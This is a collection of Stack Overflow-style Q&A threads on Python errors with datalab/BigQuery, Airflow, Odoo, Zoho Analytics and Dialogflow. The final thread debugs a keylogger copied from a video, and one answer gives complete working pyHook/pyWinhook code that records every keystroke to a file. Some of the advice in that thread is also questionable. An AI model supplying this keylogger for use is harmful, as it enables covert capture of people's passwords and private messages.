Google datalab fails to query and create table - python-3.x

I'm trying to query a large amount of data in BigQuery and then write the result to a table in the desired dataset (datasetxxx), using "datalab" with PyCharm as the IDE. Below is my code:
query = bq.Query(sql=myQuery)
job = query.execute_async(
    output_options=bq.QueryOutput.table('datasetxxx._tmp_table', mode='overwrite', allow_large_results=True))
job.result()
However, I ended up with "No project ID found". The project ID is supplied through a .json credentials file, as os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = path to the file. I also tried to declare the project ID explicitly, as follows:
self.project_id = 'xxxxx'
query = bq.Query(sql=myQuery, context=self.project_id)
This time I ended up with the following error:
TypeError: __init__() got an unexpected keyword argument 'context'.
The datalab package is also up to date. Thanks for your help.
Re: the project ID is specified in the "FROM" clause, and I'm also able to see the path to the .json file using the "echo" command. Below is the stack trace:
Traceback (most recent call last):
File "xxx/Queries.py", line 265, in <module>
brwdata._extract_gbq()
File "xxx/Queries.py", line 206, in _extract_gbq
, allow_large_results=True))
File "xxx/.local/lib/python3.5/site packages/google/datalab/bigquery/_query.py", line 260, in execute_async
table_name = _utils.parse_table_name(table_name, api.project_id)
File "xxx/.local/lib/python3.5/site-packages/google/datalab/bigquery/_api.py", line 47, in project_id
return self._context.project_id
File "xxx/.local/lib/python3.5/site-packages/google/datalab/_context.py", line 62, in project_id
raise Exception('No project ID found. Perhaps you should set one by running'
Exception: No project ID found. Perhaps you should set one by running "%datalab project set -p <project-id>" in a code cell.

So if you run "echo $GOOGLE_APPLICATION_CREDENTIALS" you can see the path to your JSON file.
Could you make sure the "FROM" clause in the query specifies the right external project?
Also, if your QueryOutput destination is in your very same project, you are doing it right:
table('dataset.table'.....)
But in the other case you should specify:
table('project.dataset.table'....)
I don't know exactly how you are building the query, but the error might be there.
I reproduced this and it worked fine for me:
import google.datalab
from google.datalab import bigquery as bq
import os
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "./bqauth.json"
myQuery="SELECT * FROM `MY_EXAMPLE_PROJECT.MY_EXAMPLE_DATASET.MY_EXAMPLE_TABLE` LIMIT 1000"
query = bq.Query(sql=myQuery)
job = query.execute_async(
    output_options=bq.QueryOutput.table('MY_EXAMPLE_PROJECT.MY_EXAMPLE_DATASET2.MY_EXAMPLE_TABLE2', mode='overwrite', allow_large_results=True))
job.result()

Here's the updated way, in case someone needs it:
You can now use the Context in the latest version as:
from google.datalab import bigquery as bq
from google.datalab import Context as ctx
ctx.project_id = 'PROJECT_ID'
df = bq.Query(query).execute()
...
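Putting it together with the destination-table flow from the question, here is a minimal sketch; it assumes the Context API also exposes default() and set_project_id(), as in the datalab sources referenced in the traceback, and all names and paths are placeholders:

import os
from google.datalab import bigquery as bq
from google.datalab import Context

# Placeholder credentials file and project ID.
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "./bqauth.json"
Context.default().set_project_id('PROJECT_ID')

# Same pattern as the question: write the query result to a table,
# overwriting it if it already exists.
myQuery = "SELECT * FROM `PROJECT_ID.datasetxxx.some_table` LIMIT 1000"
query = bq.Query(sql=myQuery)
job = query.execute_async(
    output_options=bq.QueryOutput.table(
        'datasetxxx._tmp_table', mode='overwrite', allow_large_results=True))
job.result()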

Related

How to use bulk_load in apache airflow

I have Apache Airflow 2.1.4 and a Postgres database.
I need to insert multiple rows at a time, so I am going to use the bulk_load method of PostgresHook, but I get an error every time.
data = pd.read_csv(open(filepath, 'rb'))
buffer = StringIO()
buffer.write(data.to_csv(index=None, header=None, sep='\t'))
buffer.seek(0)
schema_table = 'schema.table'
with PostgresHook(postgres_conn_id='my_pg_database'):
    PostgresHook.bulk_load(table=schema_table, tmp_file=buffer)
The error I get:
Traceback (most recent call last):
File "/home/airflow/dags/my_python_file.py", line 76, in <module>
my_func(filepath=my_file, target_schema=schema, target_table=table)
File "/home/airflow/dags/my_python_file.py", line 39, in my_func
with PostgresHook(postgres_conn_id='my_pg_database'):
AttributeError: __enter__
I couldn't even find any examples of bulk_load usage. I would appreciate any clue. Thank you.
PostgresHook (and any other hook, really) is not a "context manager"; you cannot use with: to use it.
Something like that should work:
postgres_hook = PostgresHook(postgres_conn_id='my_pg_database')
postgres_hook.bulk_load(...)
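Note also that bulk_load wraps COPY ... FROM STDIN and takes a path to a tab-separated file on disk, so the StringIO buffer from the question won't work as tmp_file. A fuller sketch under those assumptions, reusing the question's names (the provider import path is the Airflow 2.x one):

import pandas as pd
from tempfile import NamedTemporaryFile
from airflow.providers.postgres.hooks.postgres import PostgresHook

filepath = 'my_data.csv'  # placeholder, as in the question

data = pd.read_csv(filepath)
with NamedTemporaryFile(mode='w', suffix='.tsv') as tmp:
    # Write the frame to a real file; bulk_load expects a filename,
    # not an in-memory buffer.
    data.to_csv(tmp.name, index=None, header=None, sep='\t')
    postgres_hook = PostgresHook(postgres_conn_id='my_pg_database')
    postgres_hook.bulk_load(table='schema.table', tmp_file=tmp.name)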

odoo create database via xmlrpc

I'm trying to script the creation of a new database, plus import of data from other sources, in Odoo.
I am at the first step, creating a new database.
I have the following code, but it doesn't work:
import xmlrpc.client
print("Db name : ", end="")
db_name = input()
with xmlrpc.client.ServerProxy('127.0.0.1:8070/xmlrpc/2/db') as mod:
    RES = mod.create_database(db_name, False, 'en_US')
(note that my test server does run on localhost port 8070)
The result is :
$ python3 baseodoo.py
Db name : please_work
Traceback (most recent call last):
File "baseodoo.py", line 5, in <module>
with xmlrpc.client.ServerProxy('127.0.0.1:8070/xmlrpc/2/db') as mod:
File "/usr/lib/python3.8/xmlrpc/client.py", line 1419, in __init__
raise OSError("unsupported XML-RPC protocol")
OSError: unsupported XML-RPC protocol
I am unsure about the URL ending in /db; I got it from dispatch_rpc(…) in http.py, which tests service_name for "common", "db" and "object".
Also, in dispatch(…) from db.py, a method name is prefixed with "exp_", so calling create_database should execute the exp_create_database function in db.py.
I guess my reasoning is flawed, but I don't know where. Help!
EDIT :
OK, I'm stupid: the URL should start with "http://". Still, I now get
xmlrpc.client.Fault: <Fault 3: 'Access Denied'>
EDIT2 :
There was a typo in the password I gave, so closing the question now.
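For reference, a corrected sketch: the URL includes the scheme, and the db service checks the server's master password (admin_passwd in odoo.conf; 'MASTER_PASSWORD' below is a placeholder) before dispatching the remaining arguments to exp_create_database:

import xmlrpc.client

print("Db name : ", end="")
db_name = input()

# The URL must include the scheme, otherwise ServerProxy raises
# OSError("unsupported XML-RPC protocol").
with xmlrpc.client.ServerProxy('http://127.0.0.1:8070/xmlrpc/2/db') as mod:
    # dispatch() in db.py consumes the first parameter as the master
    # password, then calls exp_create_database(db_name, demo, lang).
    RES = mod.create_database('MASTER_PASSWORD', db_name, False, 'en_US')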

Why does importing data to the Zoho Analytics API cause an error?

My goal is to write a script in Python 3 that will push data into an existing table in Zoho Analytics; the script will be run by a scheduler once a week.
What I have tried so far:
I can successfully import some data using cURL commands, like so:
curl -X POST \
  'https://analyticsapi.zoho.com/api/OwnerEmail/Workspace/TableName?ZOHO_ACTION=IMPORT&ZOHO_OUTPUT_FORMAT=JSON&ZOHO_ERROR_FORMAT=JSON&ZOHO_API_VERSION=1.0&ZOHO_IMPORT_TYPE=APPEND&ZOHO_AUTO_IDENTIFY=True&ZOHO_ON_IMPORT_ERROR=ABORT&ZOHO_CREATE_TABLE=False' \
  -H 'Authorization: Zoho-oauthtoken *******' \
  -H 'content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW' \
  -F ZOHO_FILE='path_to_csv'
What I found out is that the ReportClient provided by the Zoho Analytics team (Zoho Report Client for Python) is not compatible with Python 3. Hence, I installed a wrapper for this ReportClient from [here](https://pypi.org/project/zoho-analytics-connector).
Following the sample examples from the Zoho website and the tests in the wrapper's GitHub repo, I implemented something like this:
Have a class to keep my ENV variables
import os
from zoho_analytics_connector.report_client import ReportClient, ServerError
from zoho_analytics_connector.enhanced_report_client import EnhancedZohoAnalyticsClient

class ZohoTracking:
    LOGINEMAILID = os.getenv("ZOHOANALYTICS_LOGINEMAIL")
    REFRESHTOKEN = os.getenv("ZOHOANALYTICS_REFRESHTOKEN")
    CLIENTID = os.getenv("ZOHOANALYTICS_CLIENTID")
    CLIENTSECRET = os.getenv("ZOHOANALYTICS_CLIENTSECRET")
    DATABASENAME = os.getenv("ZOHOANALYTICS_DATABASENAME")
    OAUTH = True
    TABLENAME = "My Table"
Instantiate the Client Class
def get_enhanced_zoho_analytics_client(self) -> EnhancedZohoAnalyticsClient:
    assert (not self.OAUTH and self.AUTHTOKEN) or (self.OAUTH and self.REFRESHTOKEN)
    rc = EnhancedZohoAnalyticsClient(
        # Just setting email, token, etc. using the class attributes above
        ...
    )
    return rc
Then I have a method to upload data to the existing table; the data_upload() call in it is where the problem occurs.
def enhanced_data_upload(self):
    enhanced_client = self.get_enhanced_zoho_analytics_client()
    try:
        with open("./import/tracking3.csv", "r") as f:
            import_content = f.read()
            print(type(import_content))
    except Exception as e:
        print(f"Error:Check if file exists in the import directory {str(e)}")
        return
    res = enhanced_client.data_upload(import_content=import_content, table_name=ZohoTracking.TABLENAME)
    assert res
Traceback (most recent call last):
File "push2zoho.py", line 106, in <module>
sample.enhanced_data_upload()
File "push2zoho.py", line 100, in enhanced_data_upload
res = enhanced_client.data_upload(import_content=import_content, table_name=ZohoTracking.TABLENAME)
File "/Users/.../zoho_analytics_connector/enhanced_report_client.py", line 99, in data_upload
matching_columns=matching_columns)
File "/Users/.../site-packages/zoho_analytics_connector/report_client.py", line 464, in importData_v2
r=self.__sendRequest(url=url,httpMethod="POST",payLoad=payload,action="IMPORT",callBackData=None)
File "/Users/.../zoho_analytics_connector/report_client.py", line 165, in __sendRequest
raise ServerError(respObj)
File "/Users/.../zoho_analytics_connector/report_client.py", line 1830, in __init__
contHeader = urlResp.headers["Content-Type"]
TypeError: 'NoneType' object is not subscriptable
That is the error I receive. What am I missing in this puzzle? Help is appreciated.
In Feb 2021 I changed this inherited Zoho code in my library.
Now it is:
contHeader = urlResp.headers.get("Content-Type",None)
which avoids the final exception you had.
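With that fix, the wrapper no longer masks the underlying failure with the 'NoneType' TypeError; the real import problem surfaces as a ServerError that you can catch around the upload. A sketch reusing the names from the question:

from zoho_analytics_connector.report_client import ServerError

try:
    res = enhanced_client.data_upload(
        import_content=import_content, table_name=ZohoTracking.TABLENAME)
    assert res
except ServerError as e:
    # The actual Zoho-side import error (bad credentials, wrong table
    # name, malformed CSV, ...) is reported here instead.
    print(f"Zoho import failed: {e}")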

Trouble sending a batch create entity request in dialogflow

I have defined the following function. The purpose is to make a batch create-entity request with the Dialogflow client. I switched to this method after sending many individual requests did not scale well.
The problem seems to be the line that defines EntityType. It seems "entityTypes" is not valid, but that is what is in the Dialogflow v2 documentation, which is the current version I am using.
Any ideas on what the issue is?
def create_batch_entity_types(self):
    client = self.get_entity_client()
    print(DialogFlowClient.batch_list)
    EntityType = {
        "entityTypes": DialogFlowClient.batch_list
    }
    response = client.batch_update_entity_types(parent=AGENT_PATH, entity_type_batch_inline=EntityType)

    def callback(operation_future):
        # Handle result.
        result = operation_future.result()
        print(result)

    response.add_done_callback(callback)
After running the function I received this error
Traceback (most recent call last):
File "df_client.py", line 540, in <module>
create_entity_types_from_database()
File "df_client.py", line 426, in create_entity_types_from_database
df.create_batch_entity_types()
File "/Users/andrewflorial/Documents/PROJECTS/curlbot/dialogflow/dialogflow_accessor.py", line 99, in create_batch_entity_types
response = client.batch_update_entity_types(parent=AGENT_PATH, entity_type_batch_inline=EntityType)
File "/Users/andrewflorial/Documents/PROJECTS/curlbot/venv/lib/python3.7/site-packages/dialogflow_v2/gapic/entity_types_client.py", line 767, in batch_update_entity_types
update_mask=update_mask,
ValueError: Protocol message EntityTypeBatch has no "entityTypes" field.
The argument for entity_type_batch_inline must have the same form as EntityTypeBatch.
Look at how that type is defined: https://dialogflow-python-client-v2.readthedocs.io/en/latest/gapic/v2/types.html#dialogflow_v2.types.EntityTypeBatch
It has to have an entity_types field, not entityTypes.
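So renaming the key is enough; a minimal sketch with the names from the question:

# EntityTypeBatch uses snake_case protobuf field names.
entity_type_batch = {
    "entity_types": DialogFlowClient.batch_list
}
response = client.batch_update_entity_types(
    parent=AGENT_PATH, entity_type_batch_inline=entity_type_batch)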

No attribute 'HookManager'

I am copying the key logger from this video (https://www.youtube.com/watch?v=8BiOPBsXh0g) and running the code:
import pyHook, sys, logging, pythoncom

file_log = 'C:\Users\User\Google Drive\Python'

def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
    chr(event.Ascii)
    logging.log(10, chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.Pumpmessages()
This returns the error:
Traceback (most recent call last):
File "C:\Users\User\Google Drive\Python\pyHook.py", line 2, in <module>
import pyHook, sys, logging, pythoncom
File "C:\Users\User\Google Drive\Python\pyHook.py", line 12, in <module>
hooks_manager = pyHook.HookManager()
AttributeError: 'module' object has no attribute 'HookManager'
I am running Python 2.7.11 on a Windows computer.
I don't know what the problem is; please help.
Thank you.
I found the solution: if you open HookManager.py and change all occurrences of 'key_hook' to 'keyboard_hook', the error no longer occurs.
I'm still unsure what the issue is, but I found a solution.
If you move the program you are trying to run into the same folder as the HookManager.py file, then it works.
For me this folder was:
C:\Python27\Lib\site-packages\pyHook
This line is wrong:
file_log = 'C:\Users\User\Google Drive\Python'
The system doesn't allow your program to write to the C: drive, so you should use another path, like the D: or E: drive, as given below:
file_log = 'D:\keyloggerOutput.txt'
I had the same error message after installing pyWinhook-1.6.1 on Python 3.7 from the zip file pyWinhook-1.6.1.zip.
In the application file, I replaced the import statement "import pyWinhook as pyHook" with "from pywinhook import *". The problem was then solved.
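Putting the pyWinhook route together, a sketch of a Python 3 variant of the video's code (this assumes pyWinhook-1.6.1 is installed; also, the file must not be named pyHook.py, or it will shadow the module as in the traceback above):

import logging
import pythoncom
import pyWinhook as pyHook

file_log = r'D:\keyloggerOutput.txt'  # a writable path, per the answer above
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')

def OnKeyboardEvent(event):
    # Log each pressed key as a character.
    logging.log(10, chr(event.Ascii))
    return True

hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()  # note the capital M, unlike the question's code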
